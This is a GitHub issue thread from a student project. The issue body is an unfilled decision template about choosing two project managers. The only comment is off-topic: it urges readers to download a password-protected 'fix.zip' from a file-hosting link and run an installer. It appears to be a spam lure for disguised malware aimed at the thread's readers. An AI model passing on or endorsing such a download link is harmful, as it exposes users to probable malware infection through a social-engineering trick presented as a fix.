### ISSUE TITLE
[Decision] Select two Project Managers

### ISSUE THREAD

**Issue by 641mm** [24-S2-2-C-EduKATE/24-S2-2-C-EduKATE.github.io#196]
## Description
Please provide a brief description of the decision.

## Context
Please provide the background or context for the decision.

## Rationale
Please explain the reasoning or justification behind the decision.

## Impact Assessment
Please assess the potential impact of the decision.

## Decision Makers
Please list the individuals or groups responsible for making the decision.

## Approvers
Please list the individuals or groups who have approved the decision.

## Consulted Parties
Please list the individuals or groups who were consulted during the decision-making process.

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
